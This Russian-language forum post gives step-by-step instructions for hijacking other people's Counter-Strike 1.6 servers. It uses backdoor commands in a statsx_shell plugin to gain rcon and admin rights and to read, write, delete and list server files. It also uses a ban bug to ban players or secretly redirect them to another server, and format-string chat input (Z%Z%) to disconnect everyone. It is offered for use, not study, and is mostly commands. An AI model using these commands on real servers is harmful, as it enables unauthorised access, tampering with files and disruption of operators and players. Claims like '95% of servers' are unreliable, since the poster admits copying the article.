Виталий И Эльвира Кравчун

как взломать админку в чужом сервере в кс 1.6. как взломать админку в чужом сервере в кс 1.6

Слава

HlBrute брутят только школьники я предлагаю вам новый способ взлома сереверов через бэкдоры.

1)Взлом с помощью дыры в плагине от Mastaman statsx_shell
Ищем сервера с плагином statsx_shell но таких серверов 95% в Counter Strike
Пишем в концоле name Empower
Заходим на сервер вот вам тест сервера
[ссылка появится после проверки модератором]
Пишем в концоле mm_plugins sositesyki и жмём энтер и видим у нас появился ркон и все данные сервера
После пишем в концоле mm_plugins sosimandy_Empower после пишем amxmodmenu и видим что админка наша.
Другие команды:
mm_plugins sosimandy_del "" - удалить файл
mm_plugins sosimandy_wr "" "text" - записать в файл
mm_plugins sosimandy_rd "" - прочитать файл
mm_plugins sosimandy_dir "" - показать что в папке

>>>>> >>>>>

2)Перенаправление людей или bancsbug так же бан без админки
Заходим в Counter Strike
Заходим на сервер вот вам тест сервера
[ссылка появится после проверки модератором]
Вводим команду amx_bancsmenu и можем всех банить
Если вы хотяте перенаправить людей с другого серва на свой то пишем в коцноле ban_player ip port например ban_player 192.86.73 27015
И видим что все люди зашли на ваш сервер они думают что карта сменилась

>>>>> >>>>>

3)Можно выкинуть всех с cs и сервера без админки
Заходим на любой сервер и пишем в чате /eng
После пишем в коцноле say Z%Z%Z%Z%Z%Z%
Можно и S%S%S%S%S%S%S%S

PS:Сорри за ошибки, просто статью с одного сайта спер 🙂